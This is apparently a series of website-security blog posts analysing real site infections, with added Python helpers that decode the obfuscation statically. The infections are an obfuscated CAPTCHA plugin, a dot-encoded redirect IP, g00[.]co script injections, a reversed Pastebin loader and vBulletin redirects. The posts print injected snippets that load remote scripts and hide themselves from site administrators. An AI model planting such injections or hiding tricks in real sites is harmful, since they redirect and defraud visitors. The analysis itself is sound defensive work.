Obfuscated Links in the Captcha on Login WordPress...

Do you remember SweetCAPTCHA that tried to monetize its WordPress plugin injecting unwanted ads into web pages?

Today we've found another CAPTCHA plugin with suspicious code. While cleaning a site, our scanner reported suspicious obfuscated code in these files of the Captcha on Login plugin (45,000+ all-time installs):

captcha-on-login/index.php
captcha-on-login/templates/report.php
captcha-on-login/templates/options.php

The obfuscation had strings like this:

...
${ "GL\x4f\x42\x41LS" }[ "\x64\x78cq\x70c\x6ax\x77\x6f\x63\x72" ]
...

When we see such things, we always try to decode them to figure out whether it's legitimate or not.

...
public function options_page(){
$meu_link="hxxp://vendacomtrafegogratuito [.]com .br";$meu_link2="hxxp://hotplus [.]net .br/plugin-hotlinks-plus/?clear";include("templates/options.php");
$meu_link="hxxp://vendacomtrafegogratuito [.]com .br";$meu_link2="hxxp://hotplus [.]net .br/plugin-hotlinks-plus/?clear";
}
...

It looks like the owner of this plugin, "Anderson Makiyama", is a Brazilian developer who also owns these affiliate marketing websites:
hxxp://hotplus .net .br/ plugin-hotlinks-plus/
hxxp://funildevendasparainiciante .com .br/ onde-divulgar-links-de-afiliados/

This plugin only seems to show these links inside the WordPress admin interface, on the plugin's options and report pages, under "Other products of the author" (Outros Produtos do Autor). It may be a bit annoying, but it doesn't seem to be a big deal: it's natural for plugin developers to pitch their other products (even such questionable ones) on the plugin's internal pages, which are not visible to site visitors.

The only problem is that the link-injecting code is obfuscated. Not only does this trigger warnings from security scanners, but the practice is explicitly unacceptable under the official WordPress Plugin Directory guidelines:

4. No obfuscated code. We believe that obfuscated code violates the spirit, if not the letter, of the GPL license under which we operate....
...Intentionally obfuscated code is not the preferred form, and not allowed in the repository under any circumstances.

It's sad to see how plugins that are supposed to help stop hackers actually do things that resemble what hackers do. Sometimes you can find such plugins even in the official WordPress plugin directory.

If you are looking for alternative solutions against brute force attacks, you can check our Website Firewall.

IP Obfuscation Using Dots ………

Recently I analyzed a porn doorway script and found an interesting way to obfuscate an IP address there.

$adr1 = ".............................................................................................................................................................................";
$adr2 = "............................................................................................................................................................................................................................................";
$adr3 = ".................................................................";
$adr4 = "........................";
$ard = strlen($adr1).".".strlen($adr2).".".strlen($adr3).".".strlen($adr4);

In the above code, you can see that each byte of the IP address $ard is represented by a string of dots, where the number of dots in the string is the byte value.

This gives us the following IP address: 173 .236 .65 .24, which is used to generate a redirect URL for the doorway visitors:

header("Location: hxxp://$ard/input/?mark=20151119-$s");

In our case, the final redirect URL was hxxp://173 . 236 . 65 . 24/input/?mark=20151119-/azq9mzo3v
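The dot-counting trick can be undone statically by counting the dots and evaluating the strlen() concatenation. The following Python helper is an added example, not code from the original post; it works on a constructed PHP sample shaped like the doorway snippet above (four dot-strings of lengths 173, 236, 65 and 24, then the concatenation and the Location header), and it generalizes to any number of dot-string variables and any mix of strlen() calls and string literals.

```python
import re

# Constructed PHP sample in the shape of the doorway snippet quoted above; the dot
# counts (173, 236, 65, 24) spell the IP the post recovered. Not the real doorway file.
SAMPLE = (
    '$adr1 = "' + '.' * 173 + '";\n'
    '$adr2 = "' + '.' * 236 + '";\n'
    '$adr3 = "' + '.' * 65 + '";\n'
    '$adr4 = "' + '.' * 24 + '";\n'
    '$ard = strlen($adr1).".".strlen($adr2).".".strlen($adr3).".".strlen($adr4);\n'
    'header("Location: hxxp://$ard/input/?mark=20151119-$s");\n'
)

_DOT_ASSIGN = re.compile(r'\$(\w+)\s*=\s*"(\.+)"\s*;')
_PIECE = r'(?:strlen\(\$\w+\)|"[^"]*")'
_CONCAT_ASSIGN = re.compile(r'\$(\w+)\s*=\s*(' + _PIECE + r'(?:\s*\.\s*' + _PIECE + r')+)\s*;')
_TOKEN = re.compile(r'strlen\(\$(\w+)\)|"([^"]*)"')
_IPV4 = re.compile(r'^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$')
_LOCATION = re.compile(r'header\(\s*"Location:\s*([^"]*)"\s*\)')

def dot_lengths(code):
    """Map every $var = "....."; assignment to the number of dots it holds."""
    return {name: len(dots) for name, dots in _DOT_ASSIGN.findall(code)}

def resolve_concats(code, lengths):
    """Evaluate $x = strlen($a)."."strlen($b)...; statically, using the dot counts."""
    resolved = {}
    for name, expr in _CONCAT_ASSIGN.findall(code):
        parts = []
        for var, literal in _TOKEN.findall(expr):
            if var and var not in lengths:
                break  # refers to a variable we did not see; skip this statement
            parts.append(str(lengths[var]) if var else literal)
        else:
            resolved[name] = ''.join(parts)
    return resolved

def hidden_ips(code):
    """Keep only the resolved values that form a dotted-quad IPv4 address."""
    return {n: v for n, v in resolve_concats(code, dot_lengths(code)).items() if _IPV4.match(v)}

def redirect_targets(code):
    """Location headers with the recovered IP substituted in; other PHP vars stay as-is."""
    ips = hidden_ips(code)
    targets = []
    for url in _LOCATION.findall(code):
        for name, ip in ips.items():
            url = url.replace('$' + name, ip)
        targets.append(url)
    return targets
```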

This code was found in thousands of .php doorway files created by the attackers. This is the sort of hack that may cause trouble even after you have completely cleaned your site. You can read about such scenarios on our blog. To prevent Googlebot from indexing and re-indexing tons of pages that shouldn't have been there in the first place, it may be a good idea to close spammy directories on your server with robots.txt directives.

If you find something like this on your server, it's only the tip of the iceberg. To stop the hackers, you also need to find and close all security holes (including the backdoors that they uploaded to your site). If you need professional help with malware cleanup and site protection, please check our Website AntiVirus service.

New Wave of g00 Script Injections

Active during the past summer, the g00[.]co script injections have come back with a new wave of infections this November.

The most common variation is

<script src="hxxp: / / g00[.]co/BtFVPd"></script>

This short URL hides the hxxp://yourjavascript[.]com/3921156982/not.js script, which in turn opens hxxp://speedclick[.]info/app/amung.php?c=a&s= for visitors that come from Facebook, Google, Bing and Yahoo!

On the server side, the malware is mainly injected into WordPress theme files. You can usually find the following PHP code (originally on one line; line breaks added for readability) in either footer.php or functions.php:

if (strpos($_SERVER[base64_decode("UkVRVUVTVF9VUkk=")],
base64_decode("d3AtYWRtaW4=")) === false) 
{
echo base64_decode(base64_decode(base64_decode("VUVoT2Ft...skipped...edUFEwSw0K")));
}

It injects the g00 script into every page whose request URI doesn't contain wp-admin, so the site owner never sees it in the dashboard.
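Both the `\xNN` escapes in the Captcha on Login plugin above and the nested base64_decode() calls in this g00 injector can be unwound without executing anything. The following Python helper is an added example, not code from the original post or from either plugin; it rewrites `${"GL\x4f..."}["..."]` lookups into plain variable names and collapses literal base64_decode() calls in place, leaving the `...skipped...` blob untouched because it is not valid base64.

```python
import base64
import re

# PHP double-quoted escapes seen in the plugin: \xNN (hex) and \NNN (octal).
# Other escapes (\n, \t, \\) are deliberately not handled by this minimal helper.
_PHP_ESC = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})')

def php_unescape(s):
    """Resolve \\xNN and \\NNN escapes the way PHP does inside a double-quoted string."""
    return _PHP_ESC.sub(lambda m: chr(int(m.group(1), 16)) if m.group(1) is not None
                        else chr(int(m.group(2), 8)), s)

# ${ "GL\x4f\x42\x41LS" }[ "\x64..." ]  ->  $GLOBALS["dxcqpcjxwocr"]
_VARVAR = re.compile(r'\$\{\s*"([^"]*)"\s*\}\s*\[\s*"([^"]*)"\s*\]')

def rewrite_variable_variables(code):
    """Turn ${"..."}["..."] lookups into plain $NAME["key"] with the escapes resolved."""
    return _VARVAR.sub(lambda m: '$%s["%s"]' % (php_unescape(m.group(1)),
                                                 php_unescape(m.group(2))), code)

# base64_decode("...") with a literal argument only; nothing is evaluated.
_B64_CALL = re.compile(r'base64_decode\(\s*"([A-Za-z0-9+/=]*)"\s*\)')

def decode_base64_calls(code, max_rounds=5):
    """Replace base64_decode("...") with the decoded literal. Repeats so that nested
    calls collapse from the inside out. Arguments that are not valid base64 (such as
    the "...skipped..." blob quoted in the post) are left exactly as they are."""
    def sub(m):
        try:
            return '"%s"' % base64.b64decode(m.group(1), validate=True).decode('utf-8')
        except (ValueError, UnicodeDecodeError):
            return m.group(0)
    for _ in range(max_rounds):
        new = _B64_CALL.sub(sub, code)
        if new == code:
            break
        code = new
    return code

def deobfuscate(code):
    """Apply both rewrites; the result is for reading, never for executing."""
    return decode_base64_calls(rewrite_variable_variables(code))

if __name__ == "__main__":
    # Samples taken from the snippets quoted in the post.
    print(deobfuscate(r'${ "GL\x4f\x42\x41LS" }[ "\x64\x78cq\x70c\x6ax\x77\x6f\x63\x72" ]'))
    print(deobfuscate('if (strpos($_SERVER[base64_decode("UkVRVUVTVF9VUkk=")], '
                      'base64_decode("d3AtYWRtaW4=")) === false)'))
```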

As always, if you need site security monitoring and cleanup services, you can count on us.

Helpscout Blacklisted by Norton

Early this morning we got complaints from our clients mentioning that Norton was flagging Helpscout, a Help Desk System.

Some of the pages were triggering this warning

A quick check at Norton Safe Web clearly showed that a few files (4) were flagged by them.

We tried accessing those files to see if there was indeed any malicious content in them, but all of them led to a 404 - Not Found page. With that being said, all we can do at the moment is wait for Helpscout to ask Norton to review the blacklisting status.

Reversed Pastebin Injection in Magento DB

We worked on an infected Magento site that showed unwanted pop-up ads when you visited it. The culprit was this injected script (spaces added intentionally):

<s c r i p t>document .write('>tpircs/<>"YzSBPWt9=i?php .war/moc . nibetsap / / :sptth"=crs tpircs<'.split("").reverse().join(""))</s c r i p t>

This code uses the JavaScript reverse() array method to dynamically inject a remote script directly from Pastebin.com - https: / / pastebin . com/raw .php?i = 9tWPBSzY. This is not the first time we have seen hackers leveraging the Pastebin service.

This time, the raw Pastebin code uses the same reverse() trick to inject the final remote script from hxxp: / / lachinampa . com . mx/stat/. That script contains the actual pop-up code, which uses blablatrafic .com as the intermediary between other ad providers.
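The split/reverse/join trick can be undone statically, which is how you confirm what such an injection loads without rendering the page. The following Python helper is an added example, not code from the original post; the sample is the tag quoted above with the display spaces in the `script` tag names removed but the defanging spaces inside the URL kept, and the same function works on the second layer the post describes, since the raw paste uses the same trick.

```python
import re

# Constructed sample: the tag quoted in the post, written as the attacker wrote it
# (no spaces inside "script"). The defanging spaces inside the URL are kept as the
# post shows them, so nothing here is a live address.
SAMPLE = ("<script>document.write('>tpircs/<>\"YzSBPWt9=i?php .war/moc . nibetsap / / :sptth\"=crs tpircs<'"
          ".split(\"\").reverse().join(\"\"))</script>")

# A quoted literal immediately followed by .split("").reverse().join("")
_REVERSED = re.compile(
    r"""(['"])(.*?)\1\s*\.\s*split\(\s*(['"])\3\s*\)\s*\.\s*reverse\(\s*\)\s*\.\s*join\(\s*(['"])\4\s*\)""",
    re.S)
_SRC = re.compile(r'<script\b[^>]*\bsrc\s*=\s*["\']([^"\']*)["\']', re.I)

def reversed_literals(js):
    """Return (as_written, decoded) pairs for every literal the code reverses at runtime."""
    return [(m.group(2), m.group(2)[::-1]) for m in _REVERSED.finditer(js)]

def injected_script_sources(js):
    """Script src values that only become visible once the reverse() trick is undone."""
    sources = []
    for _, decoded in reversed_literals(js):
        sources.extend(_SRC.findall(decoded))
    return sources

def is_suspicious(js):
    """Flag code that reverses a literal into a <script> tag and writes it into the page."""
    return bool(injected_script_sources(js)) and 'document.write' in js

if __name__ == "__main__":
    print(injected_script_sources(SAMPLE))
```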

In some cases, the same pop-up code injection was noticed on WordPress sites, so this isn't limited to Magento and you should check your files and database even if you are using a different CMS. Or have us scan your site for you.

vBulletin Still Redirecting to Myfilestore .com

MyFileStore[.]com redirects from vBulletin sites have been a problem since 2011. They are associated with the VBSEO plugin, which has multiple unpatched vulnerabilities and has been discontinued for more than 3 years now. You can find more information about this hack here

Since then, the code has remained pretty much the same, with only minor changes in variable names. Just search either the datastore table or the includes/datastore/datastore_cache.php file for = preg_replace( with strtr inside it, like:

...
$gpu = preg_replace($baseline, strtr($arrvb, $ajx, $ajx2), "vbseo");

These are preceded by long gibberish strings that look like this:

...
$arrvb = '[R_=#AH_p[3"rP[abP[#Vj@?Vu=&_S?q!KZ`mu=8%$!zH8.:_T?&KuS"_K.:a}lLaxLN[}/g%>PL_K.nH$,7KuS}a8?}a}apW>L{Vj@bVugR!z?...

Despite the fact that this hack is very old and VBSEO is no longer supported (and should already have been removed from sites), we still regularly clean vBulletin websites affected by this infection.

Please keep your site's software up to date, and secure it to prevent future break-ins.